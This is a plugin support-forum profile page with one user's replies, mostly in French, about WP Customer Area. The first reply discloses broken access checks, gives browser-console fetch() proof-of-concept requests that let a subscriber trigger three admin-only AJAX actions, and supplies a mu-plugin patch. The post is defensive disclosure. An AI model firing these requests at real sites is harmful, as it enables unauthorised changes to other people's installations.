Community Forum

Forum Replies Created

  • Nicolas
    Participant
    # 1 day, 12 hours ago

    Pour les autres, en attendant que le support réponde :

    Après audit du code, 3 actions internes de “WP Customer Area” ne vérifient pas correctement certains droits d’accès. En clair, un simple utilisateur connecté au site (sans droit supérieur donc rôle subscriber) pourrait lancer 3 opérations normalement réservées aux admins :

    – modifier l’état de licence du plugin (réinitialisation/désactivation)
    – (re)créer des pages et le menu de navigation par défaut (théoriquement, car la faille est liée seulement à l’installation du plugin)
    – faire disparaître un rappel à l’admin (notification) de terminer un paramétrage du plugin


    Vous pouvez tester ces failles en copiant collant ces scripts dans la console navigateur, connecté en tant que “subscriber”

    // 1) Licence
    fetch(‘/wp-admin/admin-ajax.php’,{method:’POST’,credentials:’include’,
    headers:{‘Content-Type’:’application/x-www-form-urlencoded’},
    body:’action=cuar_validate_license’}).then(r=>console.log(‘validate_license’,r.status));

    // 2) Marquer permissions configurées
    fetch(‘/wp-admin/admin-ajax.php’,{method:’POST’,credentials:’include’,
    headers:{‘Content-Type’:’application/x-www-form-urlencoded’},
    body:’action=cuar_mark_permissions_as_configured’}).then(r=>console.log(‘mark_permissions’,r.status));

    // 3) Créer pages & navigation
    fetch(‘/wp-admin/admin-ajax.php’,{method:’POST’,credentials:’include’,
    headers:{‘Content-Type’:’application/x-www-form-urlencoded’},
    body:’action=cuar_installer_create_pages_and_nav’}).then(r=>console.log(‘create_pages_nav’,r.status));


    Patch en attendant :

    – Créez un dossier mu-plugin.
    – Créez un fichier php
    – Collez le code suivant :

    <?php

    if (!defined(‘ABSPATH’)) exit;

    function cuar_harden_gate() {
    if (!current_user_can(‘manage_options’)) wp_send_json_error([‘message’=>’Not allowed’], 403);
    }

    add_action(‘wp_ajax_cuar_installer_create_pages_and_nav’, ‘cuar_harden_gate’, 0);
    add_action(‘wp_ajax_cuar_mark_permissions_as_configured’, ‘cuar_harden_gate’, 0);
    add_action(‘wp_ajax_cuar_validate_license’, ‘cuar_harden_gate’, 0);

    Testez les exploits JavaScript précédents : une erreur 400 / 403 devrait survenir à la place d’un 200.

    in reply to: Security Issues in 8.2.5
    Nicolas
    Participant
    # 1 day, 17 hours ago

    Bonjour,

    Quelle est votre position vis à vis de cette faille de sécurité ?

    in reply to: Security Issues in 8.2.5
    Nicolas
    Participant
    # 3 years, 2 months ago

    Hi, there is no difference at all with this commit

    in reply to: Plug-ins Causing WP Plug-in Page to load for 2-3 minutes
    Nicolas
    Participant
    # 3 years, 3 months ago

    Same problem here from the begining !

    in reply to: Plug-ins Causing WP Plug-in Page to load for 2-3 minutes
    Nicolas
    Participant
    # 3 years, 5 months ago

    Pour info la version précédente du addon fonctionne donc il y a un bug dans la dernière version

    in reply to: (Re)set password invalid token
    Nicolas
    Participant
    # 3 years, 11 months ago

    Bonjour,

    De manière générale, j’ai souvent besoin de faire plus que les hooks ou overrides de templates fournis par le plugin.

    Je suis conscient du fait qu’il faut ensuite maintenir le code lors des mises à jour, chose qui est prévue.

    Ici je souhaitais simplement faire apparaître le sidebar de catégories de fichier au hover sur toutes les tailles d’écran (donc modifier 1 ligne du JS seulement).

    Cela reste tout de même pratique de pouvoir personnaliser le main.js pour être plus libre à l’avenir.

    En effet mon problème est surement lié à $dependencies.

    Merci pour votre réponse.

    in reply to: Custom main.js
    Nicolas
    Participant
    # 3 years, 11 months ago

    Bonjour,

    Merci pour l’information.

    in reply to: MAJ Publication front-office → Mauvais Addon dans le ZIP
    Nicolas
    Participant
    # 4 years, 1 month ago

    Après plusieurs tests / tentatives, je remarque qu’ en suivant la configuration de la doc (voir ma config : acf_champs_utilisateur_doc_reglages-acf.JPG)  j’ai le résultat suivant :

    • Edition du compte utilisateur n’affiche pas les champs acf_form date de naissance et description (voir acf_champs_utilisateur_doc_cuar_edit.JPG)

    • Affichage du compte utilisateur affiche les champs acf date de naissance et description (voir acf_champs_utilisateur_doc_cuar_read.JPG)

      ET : affiche également le label de 2 champs obligatoires qui doivent s’afficher sur toutes les pages sans leurs champs optionnels (voir acf_champs_page_reglages-acf.JPG)

    Lorsque je change la condition Page -> is equal to -> Account details à Page -> is not equal to -> Account details (voir acf_champs_utilisateur_INVERSEdoc_reglages-acf.JPG) alors les champs d’édition apparaissent dans l’Edition du compte utilisateur  (voir acf_champs_utilisateur_INVERSEdoc_cuar_edit.JPG).

    En espérant vous avoir aidé à m’aider 🙂

     

    in reply to: ACF ADDON Utilisation / problème
    Nicolas
    Participant
    # 4 years, 1 month ago

    Bonjour,

    Merci pour votre réponse.

    Je suis parvenu à mon bonheur en modifiant la fonction login_then_redirect_to_url(get_permalink()); de post-owner-addon.class.php pour une autre fonction qui appelle un template custom.

    Cdlt.

    in reply to: Des cuar_private_page sur la partie publique en dehors de l’espace client
Viewing 9 posts - 1 through 9 (of 9 total)